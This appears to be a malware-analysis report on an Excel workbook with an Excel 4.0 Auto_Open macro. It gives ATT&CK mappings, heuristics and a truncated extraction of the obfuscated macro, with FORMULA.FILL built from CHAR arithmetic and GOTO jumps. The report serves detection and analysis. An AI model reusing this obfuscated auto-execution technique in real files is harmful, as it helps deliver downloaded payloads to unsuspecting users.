MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains Excel 4.0 macros, specifically an Auto_Open entry, which is a known technique for executing malicious code upon opening the workbook. The macro uses the FORMULA.FILL function with a complex, obfuscated string concatenation, likely to construct and execute a command. This indicates the file is designed to download and execute a secondary payload, leveraging the Auto_Open functionality for initial execution.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126406 bytes |
SHA-256: 4c8c9e161b27493ad6d41fa256269b55224bf0ff24fadd5ca60cad22944ba4a5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!IU63006 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,FQ4,"",7.80392156862745078882 ' Sheet,FG43,"",0.31593406593406592187 ' Sheet,EM45,"",-12.58823529411764674535 ' Sheet,FF45,"",0.15689655172413793927 ' Sheet,HU58,"",0.48770491803278687160 ' Sheet,CU75,"",4313.00000000000000000000 ' Sheet,HN175,"",-408.00000000000000000000 ' Sheet,Z206,"FORMULA.FILL(CHAR(CZ62612-K35252)&CHAR(L48762/DU9576)&CHAR(CZ62612+HQ25624)&CHAR(BJ59309+GW5001)&CHAR(HR51360+JL3693)&CHAR(HR51360/BR35233)&CHAR(HR51360/EM60340)&CHAR(HR51360+IW12850)&CHAR(IF63662-IX44501)&CHAR(IF63662/FX46895)&CHAR(HR51360/IS28772)&CHAR(JR29882+HQ2631)&CHAR(FD20158-HM12680)&CHAR(L48762/DO55579)&CHAR(GQ37676/IW22463)&CHAR(JR29882/BV48824)&CHAR(IF63662+HO13503)&CHAR(HR51360/DT59555)&CHAR(BN44817+DJ40075)&CHAR(JR29882/EP30876)&CHAR(BN44817+GQ51086)&CHAR(JR29882/GG33124)&CHAR(FD20158*E38409)&CHAR(JR29882/DJ55912)&CHAR(BN44817/S44487)&CHAR(L48762-IJ1663)&CHAR(L48762*JE27896)&CHAR(HR51360/EZ214)&CHAR(FD20158*FF45)&CHAR(IF63662+EF50795)&CHAR(BN44817/HC47130)&CHAR(BJ59309*R39699)&CHAR(GQ37676+IF33954)&CHAR(BJ59309/BO20026)&CHAR(JR29882*DL26866)&CHAR(BN44817/CG21156)&CHAR(CZ62612+FT20628)&CHAR(BN44817+L8855)&CHAR(IF63662+HP49865)&CHAR(JR29882+EY22855)&CHAR(JR29882+HY19969)&CHAR(IF63662-BI49083)&CHAR(GQ37676*S7310)&CHAR(L48762/EZ26842)&CHAR(L48762/BE47997)&CHAR(HR51360+FV35968)&CHAR(JR29882/GQ26530)&CHAR(CZ62612*EN12856)&CHAR(FD20158+FS62046)&CHAR(GQ37676+IH50041)&CHAR(BJ59309-BR34067)&CHAR(CZ62612+A10531)&CHAR(CZ62612-GM38232)&CHAR(BJ59309+CB52678)&CHAR(JR29882/IW20058)&CHAR(L48762-DY30968)&CHAR(FY21380+CC49664)&CHAR(JR29882-JG592)&CHAR(FD20158+BB52865)&CHAR(CZ62612*HW48834)&CHAR(IF63662+DK61928)&CHAR(BJ59309/IS46646)&CHAR(CZ62612*FP44788)&CHAR(JR29882-JM27989)&CHAR(FY21380+FX61464),Z207)","" ' Sheet,EL207,"",479.00000000000000000000 ' Sheet,Z208,GOTO(BO5349),"" ' Sheet,EZ214,"",-4.23170731707317049342 ' Sheet,CB255,"",3.86554621848739499157 ' Sheet,JG592,"",-391.00000000000000000000 ' Sheet,JL629,"",548.00000000000000000000 ' Sheet,EO653,"",12.88888888888888928363 ' Sheet,DC658,"",15.25000000000000000000 ' Sheet,DG674,"",8.28571428571428647558 ' Sheet,DK674,"",0.14659025979680695428 ' Sheet,BK678,"",563.00000000000000000000 ' Sheet,EV732,"",448.00000000000000000000 ' Sheet,W770,"",61.25000000000000000000 ' Sheet,CH808,"",790.00000000000000000000 ' Sheet,GX844,"",238.00000000000000000000 ' Sheet,HW942,GOTO(EJ21449),"" ' Sheet,FL982,"",9.11827856989247464981 ' Sheet,HM989,"",-0.17283950617283949658 ' Sheet,JE990,"",-39.25000000000000000000 ' Sheet,DC1008,"",-83.98007812500000568434 ' Sheet,DZ1083,"",-0.30259465994236306452 ' Sheet,IR1148,"",-574.60031249999997271516 ' Sheet,FY1167,"",-0.07627018644067797004 ' Sheet,DQ1187,"",-0.10337552742616033796 ' Sheet,JJ1259,"",-456.00000000000000000000 ' Sheet,ER1263,"",-4.65217391304347849257 ' Sheet,EE1267,"",0.07709604882749758470 ' Sheet,HC1269,"",-522.00000000000000000000 ' Sheet,IX1304,"",416.00000000000000000000 ' Sheet,HH1322,"",43.00000000000000000000 ' Sheet,CS1381,"",0.13973658849983938701 ' Sheet,EQ1411,"",-516.00000000000000000000 ' Sheet,CQ1467,"",-391.00000000000000000000 ' Sheet,BR1511,"",472.00000000000000000000 ' Sheet,JR1524,"",211.00000000000000000000 ' Sheet,EI1555,"",0.07227754577577899520 ' Sheet,IJ1663,"",588.60031249999997271516 ' Sheet,HF1812,"",0.08994639029874718084 ' Sheet,CV1847,"",-0.07894736842105262720 ' Sheet,BQ1881,"",-0.20172910662824208861 ' Sheet,FM1894,"",461.00000000000000000000 ' Sheet,G1896,"",59.00000000000000000000 ' Sheet,A1913,"",328.00000000000000000000 ' Sheet,O2046,"",129.50000000000000000000 ' Sheet,FU2 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.